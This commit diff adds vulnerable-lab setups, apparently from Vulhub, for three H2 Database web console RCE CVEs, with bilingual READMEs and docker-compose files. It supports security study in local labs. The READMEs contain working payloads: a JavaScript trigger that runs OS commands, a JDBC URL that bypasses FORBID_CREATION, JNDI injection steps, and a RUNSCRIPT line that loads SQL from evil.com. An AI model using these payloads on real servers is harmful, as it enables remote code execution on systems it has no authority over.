first commit

h2database/CVE-2018-10054/README.md

@@ -0,0 +1,60 @@
+# H2 Database Web Console Authentication Remote Code Execution (CVE-2018-10054)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+H2 database is a fast, open-source Java-based relational database management system (RDBMS) that can be used in both embedded (within a Java application) and client-server modes.
+
+Springboot with h2 database comes with a web management page if you set the following options:
+
+```
+spring.h2.console.enabled=true
+spring.h2.console.settings.web-allow-others=true
+```
+
+H2 Database versions prior to 1.4.198 allow any user to access the web management page by creating a new database file or connecting to an in-memory database. After authentication, an arbitrary code can be executed by one of the following commands:
+
+- `RUNSCRIPT FROM 'http://evil.com/script.sql'`
+- `CREATE ALIAS func AS code...; CALL func ...`
+- `CREATE TRIGGER ... AS code...`
+
+References:
+
+- <https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html>
+- <https://www.exploit-db.com/exploits/45506>
+- <https://github.com/h2database/h2database/issues/1225>
+- <https://github.com/h2database/h2database/pull/1580>
+- <https://github.com/h2database/h2database/pull/1726>
+
+## Setup
+
+Start a spring-boot with h2 database 1.4.197:
+
+```
+docker compose up -d
+```
+
+After started the container, the spring-boot is listening on `http://your-ip:8080`, the management page is `http://your-ip:8080/h2-console/` by default.
+
+## Vulnerability Reproduce
+
+First, login the H2 web console by connecting to the in-memory database:
+
+```
+jdbc:h2:mem:test
+```
+
+![](1.png)
+
+Then, execute the following commands to execute the `id` command:
+
+```sql
+CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript
+    var is = java.lang.Runtime.getRuntime().exec("id").getInputStream()
+    var scanner = new java.util.Scanner(is).useDelimiter("\\A")
+    throw new java.lang.Exception(scanner.next())
+$$;
+```
+
+As you can see, the `id` command is executed successfully and the result is raised as an exception.
+
+![](2.png)

h2database/CVE-2018-10054/README.zh-cn.md

@@ -0,0 +1,58 @@
+# H2 Database Web Console认证远程代码执行漏洞（CVE-2018-10054）
+
+H2 Database是一个快速、开源的基于Java的关系型数据库管理系统（RDBMS），可用于嵌入式（集成在Java应用中）或客户端-服务器模式中。
+
+当Spring Boot集成H2 Database时，如果设置如下选项，将会启用一个Web管理页面：
+
+```
+spring.h2.console.enabled=true
+spring.h2.console.settings.web-allow-others=true
+```
+
+在1.4.198之前的H2 Database版本中，任何用户都可以通过创建新的数据库文件或连接到内存数据库来访问Web管理页面。认证通过后，攻击者可以通过以下命令之一执行任意代码：
+
+- `RUNSCRIPT FROM 'http://evil.com/script.sql'`
+- `CREATE ALIAS func AS code...; CALL func ...`
+- `CREATE TRIGGER ... AS code...`
+
+参考链接：
+
+- <https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html>
+- <https://www.exploit-db.com/exploits/45506>
+- <https://github.com/h2database/h2database/issues/1225>
+- <https://github.com/h2database/h2database/pull/1580>
+- <https://github.com/h2database/h2database/pull/1726>
+
+## 环境搭建
+
+执行如下命令启动一个集成了H2 Database 1.4.197版本的Spring Boot：
+
+```
+docker compose up -d
+```
+
+容器启动后，Spring Boot服务监听在`http://your-ip:8080`，H2管理页面默认地址为`http://your-ip:8080/h2-console/`。
+
+## 漏洞复现
+
+首先，通过连接内存数据库登录H2 Web控制台：
+
+```
+jdbc:h2:mem:test
+```
+
+![](1.png)
+
+然后，执行如下命令以执行`id`命令：
+
+```sql
+CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript
+    var is = java.lang.Runtime.getRuntime().exec("id").getInputStream()
+    var scanner = new java.util.Scanner(is).useDelimiter("\\A")
+    throw new java.lang.Exception(scanner.next())
+$$;
+```
+
+可见，`id`命令被成功执行，结果以异常的形式被抛出：
+
+![](2.png)

h2database/CVE-2018-10054/docker-compose.yml

@@ -0,0 +1,6 @@
+services:
+  web:
+    image: vulhub/spring-with-h2database:1.4.197
+    ports:
+      - "8080:8080"
+      - "5005:5005"

h2database/CVE-2021-42392/README.md

@@ -0,0 +1,55 @@
+# H2 Database Web Console Pre-Auth JNDI Injection RCE (CVE-2021-42392)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+H2 database is a fast, open-source Java-based relational database management system (RDBMS) that can be used in both embedded (within a Java application) and client-server modes.
+
+Springboot with h2 database comes with a web management page if you set the following options:
+
+```
+spring.h2.console.enabled=true
+spring.h2.console.settings.web-allow-others=true
+```
+
+H2 Database version before 1.4.206 with this management page supports to use JNDI to load the JDBC driver, which can lead to remote code execution via JNDI injection.
+
+References:
+
+- <https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/>
+- <https://mp.weixin.qq.com/s?__biz=MzI2NTM1MjQ3OA==&mid=2247483658&idx=1&sn=584710da0fbe56c1246755147bcec48e>
+- <https://github.com/h2database/h2database/commit/b24aa46f48904ce64443f8f4353d70a2eed09037>
+- <https://github.com/h2database/h2database/security/advisories/GHSA-h376-j262-vhq6>
+
+## Setup
+
+Start a spring-boot with h2 database 2.0.204:
+
+```
+docker compose up -d
+```
+
+After started the container, the spring-boot is listening on `http://your-ip:8080`, the management page is `http://your-ip:8080/h2-console/` by default.
+
+## Vulnerability Reproduce
+
+Before reproducing this issue, we can confirm that the payload in [CVE-2018-10054](../CVE-2018-10054) is not exploitable because in-memory database is disabled after 1.4.197:
+
+![](1.png)
+
+The H2 console after version 1.4.197 added a new [`-ifNotExists` option](https://github.com/h2database/h2database/pull/1726) that disable remote database creation by default. So you are unable to authenticate the H2 console without a known database file, such as in-memory database.
+
+However, the H2 console still supports [JNDI injection](https://www.veracode.com/blog/research/exploiting-jndi-injections-java), which can be used to execute arbitrary code.
+
+Simply use the [Java-Chains](https://github.com/vulhub/java-chains) to exploit the vulnerability.
+
+First, generate the malicious JNDI URL by using the `JNDI/JNDIResourceRefPayload` module (don't forget to input the command you want to execute):
+
+![](2.png)
+
+Then, go to the H2 Web console login page, enter `javax.naming.InitialContext` as the Driver class, and the JNDI URL generated by Java-Chains as the JDBC URL.
+
+![](3.png)
+
+As you can see, the command has been executed successfully:
+
+![](4.png)

h2database/CVE-2021-42392/README.zh-cn.md

@@ -0,0 +1,51 @@
+# H2 Database Web 控制台未授权JNDI注入RCE漏洞（CVE-2021-42392）
+
+H2 Database是一个快速、开源的基于Java的关系型数据库管理系统（RDBMS），可用于嵌入式（集成在Java应用中）和客户端-服务器模式。
+
+当Spring Boot集成H2 Database时，如果设置如下选项，将会启用Web管理页面：
+
+```
+spring.h2.console.enabled=true
+spring.h2.console.settings.web-allow-others=true
+```
+
+1.4.206之前版本的H2 Database管理页面支持通过JNDI加载JDBC驱动，攻击者可以利用JNDI注入实现远程代码执行。
+
+参考链接：
+
+- <https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/>
+- <https://mp.weixin.qq.com/s?__biz=MzI2NTM1MjQ3OA==&mid=2247483658&idx=1&sn=584710da0fbe56c1246755147bcec48e>
+- <https://github.com/h2database/h2database/commit/b24aa46f48904ce64443f8f4353d70a2eed09037>
+- <https://github.com/h2database/h2database/security/advisories/GHSA-h376-j262-vhq6>
+
+## 环境搭建
+
+执行如下命令启动一个集成了H2 Database 2.0.204版本的Spring Boot：
+
+```
+docker compose up -d
+```
+
+容器启动后，Spring Boot服务监听在`http://your-ip:8080`，H2管理页面默认地址为`http://your-ip:8080/h2-console/`。
+
+## 漏洞复现
+
+在复现本漏洞前，可以先确认[CVE-2018-10054](../CVE-2018-10054)中的payload已无法利用，因为1.4.197之后内存数据库被禁用：
+
+![](1.png)
+
+1.4.197之后的H2控制台新增了[`-ifNotExists`选项](https://github.com/h2database/h2database/pull/1726)，默认禁用远程数据库创建。因此，攻击者无法通过未知数据库文件（如内存数据库）进入H2控制台。
+
+但H2控制台依然支持[JNDI注入](https://www.veracode.com/blog/research/exploiting-jndi-injections-java)，可用于执行任意代码。
+
+我们可以直接使用[Java-Chains](https://github.com/vulhub/java-chains)来利用该漏洞。首先，使用`JNDI/JNDIResourceRefPayload`模块生成恶意JNDI URL（记得填写你想执行的命令）：
+
+![](2.png)
+
+然后，访问H2 Web控制台登录页，将Driver class填写为`javax.naming.InitialContext`，JDBC URL填写为Java-Chains生成的JNDI URL：
+
+![](3.png)
+
+如图所示，命令已被成功执行：
+
+![](4.png)

h2database/CVE-2021-42392/docker-compose.yml

@@ -0,0 +1,6 @@
+services:
+  web:
+    image: vulhub/spring-with-h2database:2.0.204
+    ports:
+      - "8080:8080"
+      - "5005:5005"

h2database/CVE-2022-23221/README.md

@@ -0,0 +1,54 @@
+# H2 Database Web Console Pre-Auth JDBC Attack RCE (CVE-2022-23221)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+H2 database is a fast, open-source Java-based relational database management system (RDBMS) that can be used in both embedded (within a Java application) and client-server modes.
+
+Springboot with h2 database comes with a web management page if you set the following options:
+
+```
+spring.h2.console.enabled=true
+spring.h2.console.settings.web-allow-others=true
+```
+
+In version 1.4.198, the H2 Web console restricted the creation of file databases or connecting to in-memory databases, thus fixing the [CVE-2018-10054](../CVE-2018-10054) vulnerability. However, attackers could bypass this restriction using JDBC attacks and some tricks in versions 1.4.198 up to (but not including) 2.1.210, and still execute arbitrary code.
+
+References:
+
+- <https://conference.hitb.org/hitbsecconf2021sin/materials/D1T2%20-%20Make%20JDBC%20Attacks%20Brilliant%20Again%20-%20Xu%20Yuanzhen%20&%20Chen%20Hongkun.pdf>
+- <https://www.leavesongs.com/PENETRATION/talk-about-h2database-rce.html>
+- <https://github.com/h2database/h2database/releases/tag/version-2.1.210>
+- <https://github.com/h2database/h2database/pull/1580>
+- <https://github.com/h2database/h2database/pull/1726>
+
+## Environment Setup
+
+Start a spring-boot with h2 database 2.0.206:
+
+```
+docker compose up -d
+```
+
+After started the container, the spring-boot is listening on `http://your-ip:8080`, the management page is `http://your-ip:8080/h2-console/` by default.
+
+## Vulnerability Reproduce
+
+Before reproducing this issue, we can confirm that the payload in [CVE-2018-10054](../CVE-2018-10054) is not exploitable because in-memory database is disabled after 1.4.197:
+
+![](1.png)
+
+Starting with version 1.4.197, the H2 console appends `;FORBID_CREATION=TRUE` to the JDBC URL by default, preventing the creation of file databases or connections to in-memory databases. However, attackers can bypass this restriction by adding a `\` at the end of the JDBC URL, which disrupts the URL syntax and causes FORBID_CREATION to be ignored.
+
+Combining this trick with JDBC attacks, we can construct following malicious JDBC URL:
+
+```
+jdbc:h2:mem:test;MODE=MSSQLServer;FORBID_CREATION=FALSE;INIT=CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript
+    var is = java.lang.Runtime.getRuntime().exec("id").getInputStream()
+    var scanner = new java.util.Scanner(is).useDelimiter("\\A")
+    throw new java.lang.Exception(scanner.next())
+$$;AUTHZPWD=\
+```
+
+When logging into the Web console, you can run arbitrary commands using the provided URL (pay attention to the line breaks):
+
+![](2.png)

h2database/CVE-2022-23221/README.zh-cn.md

@@ -0,0 +1,52 @@
+# H2 Database Web Console未授权JDBC攻击导致远程代码执行（CVE-2022-23221）
+
+H2 Database是一个快速、开源的基于Java的关系型数据库管理系统（RDBMS），可用于嵌入式（集成在Java应用中）和客户端-服务器模式。
+
+当Spring Boot集成H2 Database时，如果设置如下选项，将会启用Web管理页面：
+
+```
+spring.h2.console.enabled=true
+spring.h2.console.settings.web-allow-others=true
+```
+
+在1.4.198版本中，H2 Web控制台限制了文件数据库的创建和内存数据库的连接，从而修复了[CVE-2018-10054](../CVE-2018-10054)漏洞。然而，在1.4.198至2.1.210（不含）版本中，攻击者仍可通过JDBC攻击和一些技巧绕过该限制，进而执行任意代码。
+
+参考链接：
+
+- <https://conference.hitb.org/hitbsecconf2021sin/materials/D1T2%20-%20Make%20JDBC%20Attacks%20Brilliant%20Again%20-%20Xu%20Yuanzhen%20&%20Chen%20Hongkun.pdf>
+- <https://www.leavesongs.com/PENETRATION/talk-about-h2database-rce.html>
+- <https://github.com/h2database/h2database/releases/tag/version-2.1.210>
+- <https://github.com/h2database/h2database/pull/1580>
+- <https://github.com/h2database/h2database/pull/1726>
+
+## 环境搭建
+
+执行如下命令启动一个集成了H2 Database 2.0.206版本的Spring Boot：
+
+```
+docker compose up -d
+```
+
+容器启动后，Spring Boot服务监听在`http://your-ip:8080`，H2管理页面默认地址为`http://your-ip:8080/h2-console/`。
+
+## 漏洞复现
+
+在复现本漏洞前，可以先确认[CVE-2018-10054](../CVE-2018-10054)中的payload已无法利用，因为1.4.197之后内存数据库被禁用：
+
+![](1.png)
+
+自1.4.197版本起，H2控制台会默认在JDBC URL后追加`;FORBID_CREATION=TRUE`，阻止文件数据库的创建和内存数据库的连接。但攻击者可以在JDBC URL末尾添加一个反斜杠`\`，扰乱URL语法，使FORBID_CREATION被忽略。
+
+结合该技巧与JDBC攻击，可以构造如下恶意JDBC URL：
+
+```
+jdbc:h2:mem:test;MODE=MSSQLServer;FORBID_CREATION=FALSE;INIT=CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript
+    var is = java.lang.Runtime.getRuntime().exec("id").getInputStream()
+    var scanner = new java.util.Scanner(is).useDelimiter("\\A")
+    throw new java.lang.Exception(scanner.next())
+$$;AUTHZPWD=\
+```
+
+在Web控制台登录时，使用上述URL即可执行任意命令（注意换行）：
+
+![](2.png)

h2database/CVE-2022-23221/docker-compose.yml

@@ -0,0 +1,6 @@
+services:
+  web:
+    image: vulhub/spring-with-h2database:2.0.206
+    ports:
+      - "8080:8080"
+      - "5005:5005"